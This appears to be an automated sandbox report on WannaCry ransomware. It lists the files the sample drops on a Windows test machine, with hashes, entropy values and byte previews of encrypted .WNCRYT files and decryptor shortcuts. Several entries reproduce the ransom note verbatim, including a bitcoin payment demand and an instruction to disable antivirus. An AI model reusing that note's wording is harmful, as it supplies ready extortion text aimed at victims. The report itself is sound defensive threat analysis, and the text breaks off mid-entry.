                                                  SHA-512:B36622B9F44A15F3394B4A08A8DEAF8A1A865B8C7E4AB956FF233F9E77670DC30FFB5A0D004AEE50895531BFD055FD952BE02AC18509B97B9EC2708C121561F9
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........*N'.//b.Jsi...4O...=.d......Y..]]#.M.qO...zn.=j...C.EVaR,yt.CM....K......|"S..i.....@.......,!_..X/..?...Y...C9 .Sp.E..#..*qC...-sE. .8."TrQ:.h%^...3......y....B+.....b.....[T.C.?e..;.,...=.C.......f..[.]....1.Aq..+x9.y...}.S.t.z.F............u...7Y...ZP........(z.6CS[.D..r.....&z..l.I..p.....G.`.f....].~.0.6`.N.!......X..+V1A......`....86..`..p.N.q.!U.....CPO.U.={.D.B....:..'*.O.>..3^ty..&....(,@.F.....,.Co.T.-l...Uu7h.i.t`.|yJ+.....y..8.N.".o.b.`.....(..M.e......4./a..._..o9.ZL.M..t.Gx...94.5S.@...?......xl..}..i.g/..,.0..C..m..?...~R..._.J.f.....IM*'...5+:F..:.gf8.0..k...W(A...........*.p.......z?1..:...R..>....q..>..5S..k...bOfFB_...yw.].....}x.....s.x..#...P.&~.....+..H.5Q.0c....x.JN-}K/.....R'...v..Z...3,..x>I...-.1.#v.4p.ym3E..).....)m.......FIb..j.....dd3..I...........3i..g..q.^...2;.w ;{.E........\i.......;:[L.b.....X.p'&..<y...{.....B<4*;.B.Al>........t......c<.a...:3.(H.x%X..Y.!.vy.2......-._#3...b......P..

                                                  C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):33048
                                                  Entropy (8bit):7.993738689704845
                                                  Encrypted:true
                                                  SSDEEP:768:XhZf2hObb2QjRvWSPORBWW+rEyiSWJ+5Jje8E:ff2w8SP+AJrkUjK
                                                  MD5:F1D72D05F9CFD54FB9E90203E8519518
                                                  SHA1:940CB2DAE7FC49C840A12756562D57369C8FAF8F
                                                  SHA-256:E95DEC486E9826A43CA05A987C8F51169EE4CD4814A0C92B0127C0F60B701D52
                                                  SHA-512:DE43ABCDFD09FF084725C516DA442577B80248510BE7EAA24693F9D9D80AA4214BA2ADCC5503A873EE3678AE8FC7D394F2D00E57AD24C19B8D7346E796120A5F
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....8).=.....N. ..f3.:.].v...K...O..T,'.w7.bu.f...`.....G..2&...'.G.....zB>n2.P4....8.x;...b...+....yo9.......8../m..X.X.8d.G.}.`G..$|@.....T.:.W.....sSNB.z..F9'6..M...M.C,.[...Lt.o.8...(..Dm...|y>....@.].4".*(.{Ry.jS.KN<......#.ZIO.e.F....(I...............:n.. 7{..CK..........]zf.0..i...S?....<.l....k......#@..R.....<hB.>C..b...f....k......V3...~.M...xV<W..#.....I..~.....|C.....<%8UlZ.Oe...D..c.N..k.{2...0....qh.....g.y....W....D.:ipq...q............'d..}.....>.x.....Q21......_......G.C n....%.....B^.y...+.4g.......C.d...P1..*.N.b.B>xu.-s...+...!K....,..)j..y.PxU..e].e._-g}*T.?.)..8.ih=^_.-m.........*0..pUm.n._..=..^.l.e}.....#5.SYZ(p.w.....O..]......P..{G.e!.=..D.!..Y.p.......CM,.....d.r.A.Hc..x...xV.. ...0..S+./l.h..'.wpp.vR.Fc.....Q..LkF.,...3X....g.....+#>.........@~.*.y85..F:{...jk..Yj.R.o..r.k;4...eq.DcVg..;}?.W.'.....5J8.I....4..LuD.....T.......~)...5..o...eVRv..|I.Ji...LE....S.e.rIcr.I.I.....NQ...._.X...+.2.7E.<...6.T.

                                                  C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24856
                                                  Entropy (8bit):7.9923321553526705
                                                  Encrypted:true
                                                  SSDEEP:768:i0syZ6mtOfs6O1m7qnEv65J12o4otXBTGZ:i0rntas6yKut2gtRCZ
                                                  MD5:18D01CC1C5C199D2652F72F6D06B139E
                                                  SHA1:9D6B9499ED4152117163FB6C2D3CADFF74ED4EF3
                                                  SHA-256:A09016B632DBAD9B4C8576C99FDFF50BF868C447790FE42A1C6E3457B1EE3A4C
                                                  SHA-512:521FF974BA1273C0281CA64CB7ED766498A3C6932873999942F798C9D8B4919BA7D08E82D5868B784DE9E3B25FF0B5C3BC3B029C95B6C3E18F0B315C1333F5DB
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......RO.................!.k.2..w.NK....a.{+!y.4....b.x%....~>.....N.I...S...........f..o..h..4...9.s)i...8.@..l}q`.?.P.8d.. K......rT.M~.......7d.<..<`.+...]..T=.S...9....Y.3...ED@..=.....%OQ..q..<....Vs#.....J..b.5r\..Z}S7.T....oL..B.k.....`.......c..B..e...;Z.!(nr.7YH...b7P..t..p6#.@.k.[....j.......].fA......*..].cu..k+..{9.j.S..4`.F...O.<..U..k.DS...`.ebEH(...R+4..P...(.7E.Zd...j.<x.....H.~'^..7.'.H.#e...Z.......gF.r6...08..u.y,..!........|OV`.<gM...YnA..G..gY._...U7M.y`;..j...B;.7.......?6[.p.&.D.{.{.-.l.J.y~..`.4;.c.....+..$..&.....^.t..*9.....=....].YW...b.>......6...].I....vI.........;.o.z...>Q.......x....W.+.SL..7.....E%.1......U5}/.+M5L..Kl.z.v]..<A;.J./..[.......{{../...Sn..A..~e...&m......ox.P.....v..]..,hL..$.^...Q... .0.<...>....~K.l..`...O[.p......}..3~.JM.`....8V...).m..V>.w8.w.c;....QjHTd?<....R.5k....[i....O.|..J..0.......$.3C7.!........[o...F.9}u0..WM.J....+jo^......f..<V@...:...XO.t~...}.pe^.}.F.w"...%._.8...

                                                  C:\ProgramData\Microsoft\Diagnosis\osver.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):296
                                                  Entropy (8bit):7.124613151899644
                                                  Encrypted:false
                                                  SSDEEP:6:bkEh193V17r00acnV5aOeF1PFm6dB9GycnqeGnIRS01UvcmdKwsVWuv:bkEh/l17IUcvFDL/teG4S0qvJIkI
                                                  MD5:11DD56FE8A33411C1228D12F23E34EB5
                                                  SHA1:45801022373EA9CFCA8CD1FCFA76A4A22728C4DA
                                                  SHA-256:3391363D64E5981CD0CAC47CF6A8615302D10CA67F99893D5CC968C09FD6F302
                                                  SHA-512:AF0112F007AF9DD4B35ABAF7C58FF3B3EEE444670CAC690E2F144230866CC88B96B0388311B053521D989C6C23FFDDC7C1BA85847726DAE45D3EADCC22F1C58A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....6..K.V..A..N?..9.....#p.....55`..FK.!......}...VQd...}....x.C.D.3..1y..5.e.4...L=.'.....W.e..R....."......i:.6.>(.85...t/....LVcp0..T....u..K.L.!q.....M..8.;~.....Wd{U.mygX5....h7}.....W..(........|.EZ.~.L`gn..?..jp2s.........Z.+.#..!...f...t.h.1............f..!9).._,BE...}

                                                  C:\ProgramData\Microsoft\Network\Downloader\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\Network\Downloader\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1311000
                                                  Entropy (8bit):7.999851573369062
                                                  Encrypted:true
                                                  SSDEEP:24576:IVppzLOfr2WKpOJPoJc/4UiWY63TpxMLC6kymE6sTDJE8sKkYsCul:ydifrJBxSWY61iSyncxKkYsZ
                                                  MD5:126796AD0E78F2FF84BC2DBFA8DDBF59
                                                  SHA1:22A8306FD61817A5C5B83E895CAC9CC7F300EEEB
                                                  SHA-256:40A6EC570B32E03F9472D00392FF12AA8700D6A4A6979CF83582763DBC8580A8
                                                  SHA-512:1921062EBF7CC7009A3BAB1FA308F1AE6F868C7918F55C4C083C9142DE5C14A474E396D13C70C873EB455FF323A2BA80F4765C36602429F87F6FFD0773A8F3B6
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....0.[.^J-..Y...[VK...&;1..@V.C....8=..hC.H.&.<..H...X...*.......p.K....x_.?......Ix2Ik-........in....H..5..V..P....8.. mSb@CH....f.O%......S._.H.^'\.n.p}.]..Q..TM.ZSX.ZQ5.B...1.i.....\Pum..+..0X.U..J&...,k.P0}.9...K>.W.Cz8...^hr.V....+...p/3<.8..8N.............(.3.Hf%e.......?7.%.%.M..}..W8ZH..."...w...<#.3..{.@...Z.).O.}.*... .%P2.&..#0.=g.U"+]E}l....,^..,............9I.-).Mk.Vq...[vp..7y.........W....m..J..\.....?C...Z.v.hg....A.VNzD:f.......6.?#..q...#.......6cX.U9&...`.....v2....*tnfr..}..y....<#!...:.H..,.f%.M....\-Y..wf.g"....F....Xo.;-d.O.Hj..w...V.;.....er..q|B.L..y..........~>..L.(..U.............i.........Pl.n.)@...;]D.`.j...a..gL...6.1..Z...b.c..`.$..Y..v7B...p.`.}....P....nx..1.9Y..,....}q~}y.+G..._.....=....Y...8H8.ubVz..PBC,./..T..I.>8(...^*..h..g}..[.e.......*<Jc<v.2.S......OM.XR.....U....H.*A.!4am.?....s.......K.ZUp.N...p^...!.......rl]."..Xlx....!..w...~..h.5.H..fC....(.dAU......h.....:.a.W..Z.P..Zq..L.;a..

                                                  C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):25166104
                                                  Entropy (8bit):7.999991713075792
                                                  Encrypted:true
                                                  SSDEEP:786432:XUwNr64ZDvuXoUsjr+/KVjFZRRad2pf7WPvZZXACM+n:XrF64ZKYUsjiSVBEd6WPRZXf
                                                  MD5:4F23366DB6A22471BC2BDD6C24F8BB32
                                                  SHA1:3257B71FA8397B88B03A87E302A6113890D921B4
                                                  SHA-256:6EC40BA3236F2818DBD3F3C78B6CCC42771D74B66C3298B9E4DC188EA4216E69
                                                  SHA-512:FDDC5ED80DE8179CCF739217ACCA0ED622CB10A41AD623B664D27237D6661D6B739A8EFB35FD84234ECEB50662E142D5652FB595C6321463F1DE240B5E828A9C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....H2.(.......([.#[........D.S.0...uPBw{..\...7..M...Q:.P.`t7.....T.S[..a.*tr.....nm..2O.?WLk.p..........G.c.A....:.l..:3~....V..f.E.KV...!....mW.YN~.Z....K..........L.*.i;j1.D.F=..r..wp....,gu.(a.&zQ..............T....O...L.)m.;......uY..A..~..............!....p...[s8._....9.....N......5......B..i...Z..W.@.r.V.J..u..."W..T...C.W.$^..`....CM.......%.bc..`..m...^..A.Ev[E..!.......M....aY.}.q..8...ek..)...$s.?..-..+U.V..q].N.<K...f}.).<..U.+..!.i}...L..h=.E..c$.D....cJ.qF..bDs........x.;......}..Dy.*XVS.\.U......Y....9..J.w...}kxg......J...Ha..S...}.d..S|;o.du!..r..E......LwP....c6....-.9.S.t.@.......jB...7.L.-.T'.NC.._....{w.9....v..S....N.9.....(....o.4.x].E..).P...-_......b...3#......v.+........;.k...y,.....".N3..0>.,.E..M.W...S..;...........5...^9...]..5*/.6...H.. ..cD..)..(...B.jg9.V:....H.....BJ?.`..[.O./.........H..nml..`1R..?\..Kpr>..q[..?...L$..j2.t.L..V....!%.\..{.....C%.)./F.kx...V.SE1o.l....RQ....U........

                                                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):196888
                                                  Entropy (8bit):7.999058078625466
                                                  Encrypted:true
                                                  SSDEEP:3072:8lonyAoZlEDo9CPza9ilo58KBJEQIV/kmvL5MLONe9AwiXOkKfxdKuk3K:8y/o7HAe9CoeKBJEzTvLOicPkKjKf6
                                                  MD5:E35D7BBC0D57DC7723FCE0335BECD046
                                                  SHA1:588C11939B85BC67FFF669F39FCC8F71DD718077
                                                  SHA-256:0A4DEB637FE12E8533A32CB425A0EB685E85CDB52A41F651F7BC26B2CB51BEF0
                                                  SHA-512:29079AE3DF4C9120B7C6912A868D6907CE51D1480ADD8B6A8CD1BCB11002685E4A3F7EC7A1F966B702F253788FC20C93256CF5D95E23EFD45FF8AE4B0F38AE94
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......2R..~..;.d."...~...k.+.Y..$.-4..gP.b.gU6..Oq(...H^..~.......N...adLa8HF..B..7..F..lV8...L...ek#.#A....A.A.~...^R...q.w..:.r.ut..7..{......Nq....SMJ......4.K..;..Q.9.i.?cyh..V.mk....U.@.w.v...l.K.....`.....nb.....t....(.....?.RiDx,..J....)..5.f].gy............o. .!.HnU)...V...R-G.r.G..r.(ZRl..g..;}B.....^~(..Q...M....5.m..q......-D.j?.2..~=.5f..\.q.Sw.vZ..`=..}.\\3fA.Q.{08..~..............X..S..s...@.G.<....T.fb..-..."......,0..]..'QB....&..)......^<<m..)sPy....R..!..u..0.-wM/...8.O.J.V.O.S.._w}}....>.o..B...d'....,..D........M.*......\..:.=....!;^K*o....(.g`.a.J.....q..x,}Y%...;.[..s.r........8..3.%.`".Q%.w.s....0.....lN......C..B.q.Z.....n.B..5K.a0]{.A.._....c...:....:...9...S.....tS.D"...........k_W.T..:.......U,(<.*...fA !...r..2p...O.f[.9..d......`Gc..9.i&.._VBe7H.....i>U.^C..K.:...... w........}.d3...X..-...(..i..[j.#.....p.V..-iW.@.)-..nQ...+.|tT..K.....,Y..t.D..:..:.E...M..H)/...b....e..+..R.d.....w.lu...M.)!.......Z.]5...K...

                                                  C:\ProgramData\Microsoft\UEV\Scripts\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):933
                                                  Entropy (8bit):4.708686542546707
                                                  Encrypted:false
                                                  SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnrRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3yhvWmMo+S
                                                  MD5:F97D2E6F8D820DBD3B66F21137DE4F09
                                                  SHA1:596799B75B5D60AA9CD45646F68E9C0BD06DF252
                                                  SHA-256:0E5ECE918132A2B1A190906E74BECB8E4CED36EEC9F9D1C70F5DA72AC4C6B92A
                                                  SHA-512:EFDA21D83464A6A32FDEEF93152FFD32A648130754FDD3635F7FF61CC1664F7FC050900F0F871B0DDD3A3846222BF62AB5DF8EED42610A76BE66FFF5F7B4C4C0
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                  C:\ProgramData\Microsoft\UEV\Scripts\@WanaDecryptor@.exe.lnk

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon May 15 07:29:01 2023, mtime=Mon May 15 07:29:01 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                  Category:dropped
                                                  Size (bytes):577
                                                  Entropy (8bit):5.195403137227408
                                                  Encrypted:false
                                                  SSDEEP:12:8BiXpzYNbfIhUV9nzUoBjAzodwSY+GGY+GlmCt:8BzqhEZAS1TGGTGlm
                                                  MD5:AA6944E5A685F01614D23396940EDB50
                                                  SHA1:78E8BF9C092559F147E90E6222715CDF2B094048
                                                  SHA-256:636345AD7C515F5814FE1A1A7F8FD8F416536760B1947739E29DACE712AFA005
                                                  SHA-512:B5F30DF5E81368BE91278EDA05CD9A5C708142818E63130A719E5691022CAB32F5C37F41DEBA8E2B7EDBBD8EA8A67A75E2FF842DE2C3E428CC944E970332449A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:L..................F.... .....kM......kM.....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....b.M....:..M......t.2......J.. .@WANAD~1.EXE..X......V.C.V.C.....b........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y.............5*.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......226546..............n4UB.. .|..oT..9.......P..#.....n4UB.. .|..oT..9.......P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

                                                  C:\ProgramData\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):904
                                                  Entropy (8bit):7.761847202238421
                                                  Encrypted:false
                                                  SSDEEP:24:bkY6RCOOwWWrSf2+ferKcet20oYxT0TIOmDbCBl:bkY6RXprW3J20oYxYTItel
                                                  MD5:0DF7A26D21F3697302A71F0CA458405A
                                                  SHA1:0EC783E9386759699867881119F11BF0C1BC395D
                                                  SHA-256:C758CD2347A5816E8A2030913B4D44B582B41A3CA4D71BEEC8BAF6E5F4E6AC00
                                                  SHA-512:29CAC2F3F9E99D91C9BA0DBC1CE09F9F20913E98A0FB13AD9D8AC2B16D176D26D122BCC09AC4474E082F1CC0F9977BC5D06E45C2245E02B4666E72C60EDCE809
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....q...`..3...,.Y.C..1L.C{.....n..H."`!..Q.).l.d...E[..6tZ...4v...A...|...........+......kvU.ZZ.i..QKs.HoD.....Fa.Z..L6.M..Y.xd.U-..ZJZxD......f.0~..1..5N4O0..i..p...[L|:+^...J....p.7.&.7h...<...........l.^..%%.V.).M_.MC5.x.....K.8...T#.....'......c.......u.-....w.LD.....i_...E.?%!Z.........4..J..a.|.X.I...;l?.[.:ie..>.....l12...m.E.w..{TH.!.H.o6EP....1.$..B8.V....y:...gq...+W.....P....k.....n&.....|~....`._..D,.d_.Gn`"m.$.U..)Tf.'|Q..9...y"F.[..1.r.k.....ELS.@b.Z'..6c... .....Q...y...o.......W..l..7#..}...(....._.....Ny....$...rI@,*%.y.T......p.p.......|.f`...H..FK..z.<..........w$.........R)[..x.....6d.}.-Ok..t...w..I.n.j>}T3.9Zz....?....%...[6...O........Q.C*....].....D&M:<.||.....w.>.\).5_y ..7..3;.....&~......K..........x...C..J...7|..p..4.i>......g.z.l..;.).Yy.....d,.Y....E...........0.....w.F.X\.E.i^..<D.[[.l.\.K..uA.$CH.;._...=%k..

                                                  C:\ProgramData\Microsoft\User Account Pictures\@Please_Read_Me@.txt

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
